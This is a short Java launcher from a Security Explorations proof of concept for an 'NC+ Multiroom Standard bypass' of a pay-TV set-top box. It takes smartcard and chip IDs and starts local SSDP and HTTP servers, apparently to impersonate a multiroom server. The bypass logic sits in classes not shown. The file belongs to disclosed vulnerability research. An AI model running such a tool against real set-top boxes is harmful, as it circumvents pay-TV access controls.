/*## (c) SECURITY EXPLORATIONS    2018 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.io.*;
import java.net.*;

public class MultiroomServer {
 public static final String BANNER = "# NC+ Multiroom Standard bypass (SE-2011-01 Issue 33) \n# (c) SECURITY EXPLORATIONS    2018 poland\n";

 public static void usage() {
  System.out.println("usage: MultiroomServer smartcard_id chip_id");
  System.exit(1);
 }

 public static void main(String[] args) {
  try {
   System.out.println(BANNER);

   if (args.length!=2) {
    usage();
   }

   String scid=args[0];
   String cid=args[1];

   STBConfig.scid=scid;
   STBConfig.cid=cid;

   String host_addr=InetAddress.getLocalHost().getHostAddress();

   System.out.println("Server listening on: "+host_addr);
   System.out.println("- client device card# "+scid);
   System.out.println("- client device chip# "+cid);

   SSDPServer.start(host_addr);
   HTTPServer.start(host_addr,8080);
  } catch (Exception e) {
   e.printStackTrace();
  }
 }
}
